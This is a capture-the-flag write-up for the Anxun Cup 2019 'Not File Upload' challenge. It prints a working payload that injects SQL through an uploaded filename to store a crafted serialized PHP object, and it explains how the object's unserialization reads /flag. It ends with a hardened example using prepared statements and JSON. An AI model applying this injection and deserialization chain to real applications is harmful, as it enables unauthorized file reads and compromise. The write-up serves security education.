[Anxun Cup 2019] Not File Upload
2022-07-05 03:38:00 【paidx0】
BUU gives a link to the source code, so go straight to the source.
A quick look shows that the application uploads images. helper saves the image information in serialized form, so it can be deserialized in show.
<?php
class helper {
protected $ifview = True;
protected $config = "/flag";
}
$a = new helper();
echo serialize($a);
//O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}
Because the properties are protected, the property name in the serialized string has to be written as \x00*\x00 + property name; for private properties it is \x00 + class name + \x00 + property name.
$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
$attr = unserialize($attr_temp);
So I use \0\0\0 as the filler instead; show replaces it with the real prefix before deserializing.
//O:6:"helper":2:{s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}
SQL statement
INSERT INTO images (implode(",",$sql_fields)) VALUES(implode(",",$sql_val))
$sql_fields[] = "`".$key_temp."`";
$sql_val[] = "'".$value_temp."'";
title,filename,ext,path,attr
// title is controllable here; close the quoted value with a single quote
//0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d
1','2','3','4',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d)#.jpg
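For contrast with the string-concatenated INSERT and the unserialize() call above, here is a hardened save/show pair, added as an example and not taken from the challenge source. It assumes an in-memory SQLite database through PDO, the column names listed above, hypothetical function names save_image() and show_attr(), and constructed width/height attributes.

```php
<?php
// Added example, not the challenge's code. Names and sample values are assumptions.

function save_image(PDO $db, array $row): void {
    // Placeholders keep every value out of the SQL text, so a quote in the
    // title cannot close the string and supply its own attr column.
    $stmt = $db->prepare(
        'INSERT INTO images (title, filename, ext, path, attr) VALUES (?, ?, ?, ?, ?)'
    );
    $stmt->execute([
        $row['title'], $row['filename'], $row['ext'], $row['path'],
        // JSON carries data only; decoding it never instantiates a class.
        json_encode($row['attr'], JSON_THROW_ON_ERROR),
    ]);
}

function show_attr(PDO $db, int $id): array {
    $stmt = $db->prepare('SELECT attr FROM images WHERE id = ?');
    $stmt->execute([$id]);
    $attr = json_decode((string) $stmt->fetchColumn(), true, 8, JSON_THROW_ON_ERROR);
    // Accept only the expected shape and cast the fields that are used.
    if (!is_array($attr) || !isset($attr['width'], $attr['height'])) {
        throw new UnexpectedValueException('unexpected attr format');
    }
    return ['width' => (int) $attr['width'], 'height' => (int) $attr['height']];
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE images (id INTEGER PRIMARY KEY, title TEXT,
           filename TEXT, ext TEXT, path TEXT, attr TEXT)');

// Constructed input: a title that tries to close the quoted value.
$title = "1','2','3','4','x')#";
save_image($db, [
    'title' => $title, 'filename' => 'a1b2c3.jpg', 'ext' => 'jpg',
    'path' => 'pic/a1b2c3.jpg', 'attr' => ['width' => 10, 'height' => 20],
]);

// The title is stored as literal text and attr is still the server's value.
$stored = $db->query('SELECT title FROM images WHERE id = 1')->fetchColumn();
var_dump($stored === $title);
var_dump(show_attr($db, 1));
```

If the stored format has to stay PHP-serialized, passing ['allowed_classes' => false] as the second argument to unserialize() prevents the stored string from instantiating helper.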